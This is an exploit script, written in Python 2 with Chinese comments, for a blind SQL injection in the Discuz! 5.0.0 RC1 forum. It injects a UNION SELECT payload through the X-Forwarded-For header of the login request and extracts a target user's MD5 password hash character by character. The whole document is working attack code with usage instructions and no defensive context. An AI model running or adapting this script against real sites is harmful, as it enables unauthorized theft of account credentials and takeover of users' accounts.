Discuz! 5.0.0 RC1 SQL injection PoC

#!c:\python24\pyton<br /> # Discuz! 5.0.0 RC1 SQL injection PoC<br /> # Author: wofeiwo thx superheis help<br /> # Date: Aug 12th 2006<br /> <br /> import sys<br /> import httplib<br /> from urlparse import urlparse<br /> from time import sleep<br /> <br /> def injection(lenthofpass,realurl,path):<br /> sys.stdout.write('[+]The uid='+sys.argv[2]+' password hash is: \n')<br /> for num in range(1,lenthofpass+1): #相当于[1,...,32],num代表32位的MD5值<br /> ran=range(97, 123) #ran=[97,...,122]，ASCII码的a-z<br /> #for a1 in range(65,91): #a1=[65,90],ASCII码的A-Z<br /> # ran.append(a1)<br /> for a in range(48, 58): #a=[48,...,57],ASCII码的0-9<br /> ran.append(a) #将序列a加入到序列ran中<br /> <br /> for i in ran: #遍历ran序列,包括全部小写字母和数字<br /> <br /> query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'<br /> #下面是一个字典:<br /> header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}<br /> data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"<br /> #print header<br /> #sys.exit(1)<br /> http = httplib.HTTPConnection(realurl[1]) #连接到如：httplib.HTTPConnection('www.cwi.nl')<br /> http.request("POST", path + "logging.php?action=login&",data , header) #发送POS数据包<br /> #sleep(1)<br /> response = http.getresponse() #得到服务的响应包<br /> re1 = response.read() #读出所有响应数据并存入ret1中<br /> #print "re1中返回的内容为:"<br /> #print re1<br /> if re1.find('SELECT') ==1: #re1中是否含有SELECT字符，是为1，否返回-1<br /> print '[-] Unvalnerable host' #不存在漏洞<br /> print '[-] Exit..'<br /> sys.exit(1);<br /> <br /> elif re1.find('ip3') == -1:#re1中是否含有ip3字符，是为1，否返回-1<br /> sys.stdout.write(chr(i)) #输出正确的MD5密码值<br /> #print chr(i)<br /> http.close()<br /> #sleep(1)<br /> #break<br /> <br /> #print re1<br /> #print '-----------------------------------------------'<br /> http.close()<br /> #sleep(1)<br /> sys.stdout.write('\n') #打印回车<br /> <br /> def main ():<br /> print 'Discuz! 5.0.0 RC1 SQL injection exploit'<br /> print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'<br /> <br /> if len(sys.argv) == 3:<br /> url = urlparse(sys.argv[1])<br /> if url[2:-1] != '/': #从元组中第三个到倒数第二个参数<br /> u = url[2] + '/'<br /> else:<br /> u = url[2] #u=/dz/<br /> else:<br /> print "Usage: %s <url> <uid>" % sys.argv[0]<br /> print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]<br /> sys.exit(0)<br /> <br /> lenth = 32 #长度为32<br /> print '[+] Connect %s' % url[1]<br /> print '[+] Trying...'<br /> print '[+] Plz wait a long long time...'<br /> <br /> injection(lenth, url, u)<br /> <br /> print '[+] Finished'<br /> <br /> if __name__ == '__main__': main()<br />